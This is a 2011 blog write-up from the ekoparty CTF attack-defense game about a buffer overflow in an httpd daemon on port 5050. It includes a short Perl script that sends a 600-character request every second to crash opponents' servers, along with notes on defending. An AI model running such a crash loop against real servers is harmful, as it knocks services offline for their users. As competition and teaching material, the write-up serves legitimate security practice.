26 sept. 2011

ekoparty 2011 CTF [httpd daemon buffer overflow] [Attack-Defense writeup]

We continue with the binaries presented in the ekoparty 2011 CTF.
This time we analyze the "daemon1" which is the httpd server running on port 5050.
After a bit of fuzzing, we discovered that the server crash with long requests (GET /XXX [...])
  











Here we can see the crash in gdb:





















First we try to exploit the daemon1 and get flag.txt token. But due to time and some protection of the binary we decided to use it to attack and defend at the same time.

Note: If the Scoreboard bot detect's your port 5050 closed (or another daemon with different port running on the server), it will increase yout defense points (wich is a bad thing, you have to keep your attack points higher as possible and defense points lower as possible). With that in mind, we can use this for:

Attack:

Let's make some dirty code to down the 5050 port's of the another server's:

#!/usr/bin/perl
use LWP::Simple;

($host, $port) = @ARGV;
$payload = "A"x600;

while(1)
{
    $response=get("http://".$host.":".$port."/".$payload);
    sleep(1);
}

__END__


With this, opposites teams "wins" defense points, and because of that, loose overall points (The scoreboard bot checks and cannot connect to the port 5050 of the another teams).

Defense: 

2 options here, first make a script that automatically wake up your httpd server after crash (not very reliable), and two, listen a non-vulnerable server (like apache) on port 5050 (Not tested, we do not know if it meets the rules).

writeup by: localh0t (@mattdch) 

No hay comentarios:

Publicar un comentario